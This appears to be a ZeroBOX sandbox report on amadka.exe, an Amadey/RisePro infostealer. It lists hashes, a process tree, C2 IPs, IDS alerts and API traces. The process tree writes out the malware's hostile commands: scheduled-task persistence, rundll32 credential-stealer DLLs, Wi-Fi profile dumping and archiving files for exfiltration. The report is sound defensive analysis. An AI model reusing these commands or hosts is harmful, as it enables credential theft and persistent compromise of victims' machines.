Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 19, 2024, 1:10 p.m.	April 19, 2024, 1:13 p.m.

Size	2.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f854143c49c4d2fa4cf73bab97ba8d3a`
SHA256	`8c8afd00e6087780e4ee0a36f170ba06f13ba6d0c46cd2119b876e88d40c24e3`
CRC32	`17ECD98F`
ssdeep	`49152:hz28Myn3uFDrmGjA1n1Nrd/O9LunYp6VyiW9k2MYD:p28pn3yD6F7rd/OrYyiT2M`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

amadka.exe "C:\Users\test22\AppData\Local\Temp\amadka.exe"
1680
- explorha.exe "C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe"
  2264
  - amert.exe "C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe"
    2508
  - ce7dc404a0.exe "C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe"
    2748
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      2816
      - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef37c6e00,0x7fef37c6e10,0x7fef37c6e20
        2904
  - c2e58d8472.exe "C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe"
    3008
    - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
      1676
    - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
      880
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
    2100
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
      2236
      - netsh.exe netsh wlan show profiles
        2540
      - powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
        2728
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
    2480
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
ipinfo.io	A 34.117.186.192	34.117.186.192
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.4.15

IP Address	Status	Action
104.26.4.15	Active	Moloch
147.45.47.93	Active	Moloch
164.124.101.2	Active	Moloch
193.233.132.167	Active	Moloch
193.233.132.56	Active	Moloch
34.117.186.192	Active	Moloch
192.227.146.252	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 193.233.132.56:80 -> 192.168.56.103:49164	2400036	ET DROP Spamhaus DROP Listed Traffic Inbound group 37	Misc Attack
TCP 193.233.132.167:80 -> 192.168.56.103:49165	2400036	ET DROP Spamhaus DROP Listed Traffic Inbound group 37	Misc Attack
TCP 192.168.56.103:49165 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.167:80 -> 192.168.56.103:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.233.132.167:80 -> 192.168.56.103:49165	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 193.233.132.167:80 -> 192.168.56.103:49165	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.167:80 -> 192.168.56.103:49168	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.233.132.167:80 -> 192.168.56.103:49168	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 193.233.132.167:80 -> 192.168.56.103:49168	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 193.233.132.56:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 193.233.132.56:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49168 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 193.233.132.56:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 193.233.132.56:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 193.233.132.56:80 -> 192.168.56.103:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.233.132.56:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 193.233.132.56:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49173 -> 193.233.132.56:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 193.233.132.56:80 -> 192.168.56.103:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.233.132.56:80 -> 192.168.56.103:49173	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 193.233.132.167:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.56:80 -> 192.168.56.103:49173	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 147.45.47.93:58709 -> 192.168.56.103:49185	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.103:49185 -> 147.45.47.93:58709	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.103:49185 -> 147.45.47.93:58709	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 147.45.47.93:58709 -> 192.168.56.103:49185	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	A Network Trojan was detected
TCP 192.168.56.103:49186 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49186 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49188 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 147.45.47.93:58709	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	A Network Trojan was detected
TCP 192.168.56.103:49185 -> 147.45.47.93:58709	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.103:49185 -> 147.45.47.93:58709	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.103:49186 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49188 104.26.4.15:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=db-ip.com	65:b1:27:2e:35:d2:f7:1f:20:04:c5:ca:ea:4e:7a:b4:69:6a:83:00

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameA April 19, 2024, 1:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 19, 2024, 1:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 19, 2024, 1:10 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 104 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:10 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0
IsDebuggerPresent April 19, 2024, 1:11 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 19, 2024, 1:10 p.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW April 19, 2024, 1:10 p.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1	0

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000029a8c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670b50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670b50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670b50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b671090 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b671090 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b671090 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b671560 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b671560 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b670df0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002ade90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002ade90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002adcd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002adcd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b697c10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b697c10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b697eb0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b697eb0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000286a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000286a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000286a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 19, 2024, 1:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000286a90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (5 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 19, 2024, 1:10 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (5 events)

section	\x00
section	.idata
section	wvtamnbw
section	jjaorssu
section	.taggant

One or more processes crashed (50 out of 489 events)

Time & API	Arguments	Status
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: fb 60 bd 14 b0 e4 ee e9 00 02 00 00 80 e7 5c 0c exception.symbol: amadka+0x6cc34 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 445492 exception.address: 0x111cc34 registers.esp: 4062580 registers.edi: 0 registers.eax: 4062596 registers.ebp: 4062596 registers.edx: 4062588 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb ba a6 d3 f4 74 53 bb 0a 09 7f 77 e9 11 00 00 exception.symbol: amadka+0x6dbea exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 449514 exception.address: 0x111dbea registers.esp: 4062548 registers.edi: 604292944 registers.eax: 17948002 registers.ebp: 4007964692 registers.edx: 4062588 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 53 89 04 24 51 e9 00 00 00 00 b9 51 72 55 67 exception.symbol: amadka+0x6e69f exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 452255 exception.address: 0x111e69f registers.esp: 4062548 registers.edi: 604292944 registers.eax: 17951253 registers.ebp: 4007964692 registers.edx: 0 registers.ebx: 239849 registers.esi: 0 registers.ecx: 938545601	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 68 0c 8b 2a 6d 89 0c 24 52 ba 40 b1 7b 7b 4a exception.symbol: amadka+0x1e5fbd exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 1990589 exception.address: 0x1295fbd registers.esp: 4062544 registers.edi: 17984442 registers.eax: 26405 registers.ebp: 4007964692 registers.edx: 19488521 registers.ebx: 53216044 registers.esi: 19472403 registers.ecx: 812	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 57 e9 bc fb ff ff 05 04 00 00 00 55 bd d1 8a exception.symbol: amadka+0x1e63da exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 1991642 exception.address: 0x12963da registers.esp: 4062548 registers.edi: 17984442 registers.eax: 26405 registers.ebp: 4007964692 registers.edx: 19514926 registers.ebx: 53216044 registers.esi: 19472403 registers.ecx: 812	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 68 c4 ca 03 17 89 34 24 e9 a4 01 00 00 81 e5 exception.symbol: amadka+0x1e61a0 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 1991072 exception.address: 0x12961a0 registers.esp: 4062548 registers.edi: 17984442 registers.eax: 4294943880 registers.ebp: 4007964692 registers.edx: 19514926 registers.ebx: 53216044 registers.esi: 19472403 registers.ecx: 466665	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 83 ec 04 e9 25 04 00 00 01 c7 exception.symbol: amadka+0x1e8ca7 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2002087 exception.address: 0x1298ca7 registers.esp: 4062548 registers.edi: 0 registers.eax: 1259 registers.ebp: 4007964692 registers.edx: 19525789 registers.ebx: 19494499 registers.esi: 4294943168 registers.ecx: 96	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb e9 d8 fc ff ff 01 f3 e9 02 fe ff ff 56 e9 a2 exception.symbol: amadka+0x1ef991 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2029969 exception.address: 0x129f991 registers.esp: 4062544 registers.edi: 8007408 registers.eax: 32902 registers.ebp: 4007964692 registers.edx: 680755288 registers.ebx: 19494499 registers.esi: 4294943168 registers.ecx: 19527010	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 51 53 68 91 94 5f 7f 8b 1c 24 e9 c8 fd ff ff exception.symbol: amadka+0x1ef8c0 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2029760 exception.address: 0x129f8c0 registers.esp: 4062548 registers.edi: 1114345 registers.eax: 32902 registers.ebp: 4007964692 registers.edx: 680755288 registers.ebx: 0 registers.esi: 4294943168 registers.ecx: 19530480	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 68 93 b5 01 42 89 04 24 exception.symbol: amadka+0x1f6793 exception.instruction: in eax, dx exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2058131 exception.address: 0x12a6793 registers.esp: 4062540 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 4007964692 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 19534644 registers.ecx: 20	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: amadka+0x1f3b86 exception.address: 0x12a3b86 exception.module: amadka.exe exception.exception_code: 0xc000001d exception.offset: 2046854 registers.esp: 4062540 registers.edi: 1114345 registers.eax: 1 registers.ebp: 4007964692 registers.edx: 22104 registers.ebx: 0 registers.esi: 19534644 registers.ecx: 20	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 0e 3a 2d 12 01 exception.symbol: amadka+0x1f51fc exception.instruction: in eax, dx exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2052604 exception.address: 0x12a51fc registers.esp: 4062540 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 4007964692 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 19534644 registers.ecx: 10	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 50 55 68 b6 89 ff 7f ff 34 24 5d 83 c4 04 81 exception.symbol: amadka+0x1fa2db exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2073307 exception.address: 0x12aa2db registers.esp: 4062544 registers.edi: 1114345 registers.eax: 29174 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 69714546 registers.esi: 19570886 registers.ecx: 792330240	1
